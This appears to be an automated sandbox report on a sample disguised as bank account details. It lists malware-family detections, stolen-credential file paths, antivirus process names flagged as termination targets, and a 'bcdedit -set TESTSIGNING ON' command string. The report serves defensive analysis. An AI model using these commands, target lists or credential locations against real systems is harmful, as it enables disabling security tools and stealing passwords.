Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/snakeklg.gg!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3p!#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: o!#aggr:dridexdllnames
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:unnamedeccparams
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: n!#tel:unnamedeccparams
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: i!#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: h!#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: g!#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: f!#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#bm_copyrenamediname_csrss.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4E0C4 AllocateAndInitializeSid,FreeSid, 42_2_00007FF650D4E0C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError, 42_2_00007FF650D4F884
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: Progman Folder*Administrative Tools
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: shell_traywnd

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Queries volume information: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4418C cpuid 42_2_00007FF650D4418C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId, 42_2_00007FF650CFF3E8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4D78C RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError, 42_2_00007FF650D4D78C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Code function: 34_2_00007FF758858ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 34_2_00007FF758858ED4

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts
May initialize a security null descriptor
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: S:(ML;;NRNWNX;;;LW)]
AV process strings found (often used to terminate AV products)
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: KAVPFW.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.18287345828.0000015B08195000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: avgui.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\123.EXE
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, mpam-f54ed867.exe Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp Binary or memory string: regedit.com
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: license.rtf.|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp Binary or memory string: regmon.exe

Stealing of Sensitive Information:

Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Evrial Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GhostRat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Generic Dropper
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ISRStealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Betabot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: secondexodusrealtors.co.ke
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp String found in binary or memory: PUA:Block:Ethereum
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp String found in binary or memory: get_UseMachineKeyStore
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Yara detected Credential Stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Remote Access Functionality:

Yara detected Snake Keylogger
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Evrial Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GhostRat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Koadic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Hancitor
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ISRStealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected HawkEye Rat
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger]
Detected Remcos RAT
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Metasploit Payload
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5916, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected Nanocore Rat
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected NetWire RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected Imminent RAT
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
